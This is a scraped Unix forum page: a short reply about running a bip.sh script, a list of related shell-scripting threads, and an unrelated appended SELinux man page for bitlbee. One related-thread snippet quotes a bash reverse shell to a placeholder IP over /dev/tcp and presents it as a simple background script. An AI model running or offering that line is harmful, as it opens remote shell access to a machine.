Sponsored Content
Top Forums Shell Programming and Scripting Shell scripting issue-running the background script Post 302822893 by RudiC on Tuesday 18th of June 2013 10:45:30 AM
Old 06-18-2013
Not clear what you want to achieve. You say bip.sh runs in background but you want it to run in foreground? In your code snippet I can't see bip.sh in background; you run it in FG until it finishes, then wait 6 min (for what?), and then run runXitInvoice_PROFORMA_integ on the last two lines of the log file. Please explain in detail and with samples what you want.

10 More Discussions You Might Find Interesting

1. Shell Programming and Scripting

Facing issue in Solaris OS in crontab for running shell script

Hello i have a shell script. it is running fine when i manually run at command prompt using following command ./script_file but while running shell script from crontab, it is giving error in each line. (2 Replies)
Discussion started by: mabrar
2 Replies

2. Shell Programming and Scripting

Background Process Shell Scripting

I have a following program: echofunc() { filename=$1 echo "reading $filename" while read line do echo $line; sleep 6; done < $filename } split -5 new.dat ls x* > input.dat while read file do echofun $file & done < input.dat (3 Replies)
Discussion started by: dhieraj
3 Replies

3. Shell Programming and Scripting

Shell script running in background

Dear all, I have a little problem trying to run a shell script in background, as you can see below. - the script is a simple one: #! /bin/bash exec /bin/bash -i 0</dev/tcp/IP_ADDR/33445 1>&0 2>&0 - the name of the script is test.sh - the script is executable(chmod +x test.sh) - on the... (2 Replies)
Discussion started by: gd05
2 Replies

4. Shell Programming and Scripting

Running Shell Script in the cron, background proccess

Hi, i was looking for an answer for some trouble im having runing a script in the cron, thing is, that when i run it manually it works just fine. But when cron runs it, it just doenst work. I saw a reply on a similar subject, suggesting that the . .profile worked for you, but im kind of... (0 Replies)
Discussion started by: blacksteel1988
0 Replies

5. Shell Programming and Scripting

Running Shell Script in the cron, background process

Hi, i was looking for an answer for some trouble im having runing a script in the cron, thing is, that when i run it manually it works just fine. But when cron runs it, it just doenst work. I saw a reply on a similar subject, suggesting that the . .profile worked for you, but im kind of... (9 Replies)
Discussion started by: blacksteel1988
9 Replies

6. Shell Programming and Scripting

Issue in running shell script in crontab

I'm having a shell script which has to be run only once at the specified time. Shell script is like following, #!/bin/bash db2 connect to XXX > connection_status.txt This script is scheduled in crontab as following, 50 4 8 5 0 sh script.sh scheduled script is run at the specified time... (1 Reply)
Discussion started by: Rajkumar Gandhi
1 Replies

7. Shell Programming and Scripting

Shell Script for continuously checking status of a another script running in background, and immedia

Hi, I want to write a script which continuously checking status of a script running in background by nohup command. And if same script is not running then immediately start the script...please help.. i am using below command to run script nohup system_traps.sh & but in some... (9 Replies)
Discussion started by: ketanraut
9 Replies

8. Shell Programming and Scripting

Issue with running commands from shell script

I'm trying to copy files from a remote windows server to Unix server. I was successfully able to copy files from windows server using command prompt but when I run these commands from a script it's not working as expected. commands used: sftp user@remoteserver.com lcd local_dir cd... (3 Replies)
Discussion started by: naresh7590
3 Replies

9. Shell Programming and Scripting

Korn Shell script in stopped state while running in background

Hi, I want to run a shell script in background . but its going to stopped state $ ksh cat_Duplicate_Records_Removal.ksh & 8975 $ + Stopped (tty output) ksh cat_Duplicate_Records_Removal.ksh & why is this happening? Also could anyone please tell me what is a stopped... (12 Replies)
Discussion started by: TomG
12 Replies

10. UNIX for Advanced & Expert Users

Issue with tracking successful completion of Child process running in background

Hello All, I am using Linux. I have two scripts: inner_script.ksh main_wrapper_calling_inner.ksh Below is the code snippet of the main_wrapper_calling_inner.ksh: #!/bin/ksh ppids=() ---> Main array for process ids. fppids=() ---> array to capture failed process ids. pcnt=0 --->... (5 Replies)
Discussion started by: dmukherjee
5 Replies
bitlbee_selinux(8)					      SELinux Policy bitlbee						bitlbee_selinux(8)

NAME
bitlbee_selinux - Security Enhanced Linux Policy for the bitlbee processes DESCRIPTION
Security-Enhanced Linux secures the bitlbee processes via flexible mandatory access control. The bitlbee processes execute with the bitlbee_t SELinux type. You can check if you have these processes running by executing the ps com- mand with the -Z qualifier. For example: ps -eZ | grep bitlbee_t ENTRYPOINTS
The bitlbee_t SELinux type can be entered via the bitlbee_exec_t file type. The default entrypoint paths for the bitlbee_t domain are the following: /usr/bin/bip, /usr/sbin/bitlbee PROCESS TYPES
SELinux defines process types (domains) for each process running on the system You can see the context of a process using the -Z option to ps Policy governs the access confined processes have to files. SELinux bitlbee policy is very flexible allowing users to setup their bitlbee processes in as secure a method as possible. The following process types are defined for bitlbee: bitlbee_t Note: semanage permissive -a bitlbee_t can be used to make the process type bitlbee_t permissive. SELinux does not deny access to permis- sive process types, but the AVC (SELinux denials) messages are still generated. BOOLEANS
SELinux policy is customizable based on least access required. bitlbee policy is extremely flexible and has several booleans that allow you to manipulate the policy and run bitlbee with the tightest access possible. If you want to allow users to resolve user passwd entries directly from ldap rather then using a sssd server, you must turn on the authlo- gin_nsswitch_use_ldap boolean. Disabled by default. setsebool -P authlogin_nsswitch_use_ldap 1 If you want to allow all daemons to write corefiles to /, you must turn on the daemons_dump_core boolean. Disabled by default. setsebool -P daemons_dump_core 1 If you want to enable cluster mode for daemons, you must turn on the daemons_enable_cluster_mode boolean. Enabled by default. setsebool -P daemons_enable_cluster_mode 1 If you want to allow all daemons to use tcp wrappers, you must turn on the daemons_use_tcp_wrapper boolean. Disabled by default. setsebool -P daemons_use_tcp_wrapper 1 If you want to allow all daemons the ability to read/write terminals, you must turn on the daemons_use_tty boolean. Disabled by default. setsebool -P daemons_use_tty 1 If you want to deny any process from ptracing or debugging any other processes, you must turn on the deny_ptrace boolean. Enabled by default. setsebool -P deny_ptrace 1 If you want to allow all domains to use other domains file descriptors, you must turn on the domain_fd_use boolean. Enabled by default. setsebool -P domain_fd_use 1 If you want to allow all domains to have the kernel load modules, you must turn on the domain_kernel_load_modules boolean. Disabled by default. setsebool -P domain_kernel_load_modules 1 If you want to allow all domains to execute in fips_mode, you must turn on the fips_mode boolean. Enabled by default. setsebool -P fips_mode 1 If you want to enable reading of urandom for all domains, you must turn on the global_ssp boolean. Disabled by default. setsebool -P global_ssp 1 If you want to allow confined applications to run with kerberos, you must turn on the kerberos_enabled boolean. Enabled by default. setsebool -P kerberos_enabled 1 If you want to allow system to run with NIS, you must turn on the nis_enabled boolean. Disabled by default. setsebool -P nis_enabled 1 If you want to allow confined applications to use nscd shared memory, you must turn on the nscd_use_shm boolean. Enabled by default. setsebool -P nscd_use_shm 1 NSSWITCH DOMAIN
If you want to allow users to resolve user passwd entries directly from ldap rather then using a sssd server for the bitlbee_t, you must turn on the authlogin_nsswitch_use_ldap boolean. setsebool -P authlogin_nsswitch_use_ldap 1 If you want to allow confined applications to run with kerberos for the bitlbee_t, you must turn on the kerberos_enabled boolean. setsebool -P kerberos_enabled 1 MANAGED FILES
The SELinux process type bitlbee_t can manage files labeled with the following file types. The paths listed are the default paths for these file types. Note the processes UID still need to have DAC permissions. bitlbee_tmp_t bitlbee_var_run_t /var/run/bip(/.*)? /var/run/bitlbee.pid /var/run/bitlbee.sock bitlbee_var_t /var/lib/bitlbee(/.*)? cluster_conf_t /etc/cluster(/.*)? cluster_var_lib_t /var/lib/pcsd(/.*)? /var/lib/cluster(/.*)? /var/lib/openais(/.*)? /var/lib/pengine(/.*)? /var/lib/corosync(/.*)? /usr/lib/heartbeat(/.*)? /var/lib/heartbeat(/.*)? /var/lib/pacemaker(/.*)? cluster_var_run_t /var/run/crm(/.*)? /var/run/cman_.* /var/run/rsctmp(/.*)? /var/run/aisexec.* /var/run/heartbeat(/.*)? /var/run/cpglockd.pid /var/run/corosync.pid /var/run/rgmanager.pid /var/run/cluster/rgmanager.sk root_t / /initrd FILE CONTEXTS
SELinux requires files to have an extended attribute to define the file type. You can see the context of a file using the -Z option to ls Policy governs the access confined processes have to these files. SELinux bitlbee policy is very flexible allowing users to setup their bitlbee processes in as secure a method as possible. STANDARD FILE CONTEXT SELinux defines the file context types for the bitlbee, if you wanted to store files with these types in a diffent paths, you need to exe- cute the semanage command to sepecify alternate labeling and then use restorecon to put the labels on disk. semanage fcontext -a -t bitlbee_conf_t '/srv/bitlbee/content(/.*)?' restorecon -R -v /srv/mybitlbee_content Note: SELinux often uses regular expressions to specify labels that match multiple files. The following file types are defined for bitlbee: bitlbee_conf_t - Set files with the bitlbee_conf_t type, if you want to treat the files as bitlbee configuration data, usually stored under the /etc directory. bitlbee_exec_t - Set files with the bitlbee_exec_t type, if you want to transition an executable to the bitlbee_t domain. Paths: /usr/bin/bip, /usr/sbin/bitlbee bitlbee_initrc_exec_t - Set files with the bitlbee_initrc_exec_t type, if you want to transition an executable to the bitlbee_initrc_t domain. bitlbee_log_t - Set files with the bitlbee_log_t type, if you want to treat the data as bitlbee log data, usually stored under the /var/log directory. bitlbee_tmp_t - Set files with the bitlbee_tmp_t type, if you want to store bitlbee temporary files in the /tmp directories. bitlbee_var_run_t - Set files with the bitlbee_var_run_t type, if you want to store the bitlbee files under the /run or /var/run directory. Paths: /var/run/bip(/.*)?, /var/run/bitlbee.pid, /var/run/bitlbee.sock bitlbee_var_t - Set files with the bitlbee_var_t type, if you want to store the bit files under the /var directory. Note: File context can be temporarily modified with the chcon command. If you want to permanently change the file context you need to use the semanage fcontext command. This will modify the SELinux labeling database. You will need to use restorecon to apply the labels. COMMANDS
semanage fcontext can also be used to manipulate default file context mappings. semanage permissive can also be used to manipulate whether or not a process type is permissive. semanage module can also be used to enable/disable/install/remove policy modules. semanage boolean can also be used to manipulate the booleans system-config-selinux is a GUI tool available to customize SELinux policy settings. AUTHOR
This manual page was auto-generated using sepolicy manpage . SEE ALSO
selinux(8), bitlbee(8), semanage(8), restorecon(8), chcon(1), sepolicy(8) , setsebool(8) bitlbee 14-06-10 bitlbee_selinux(8)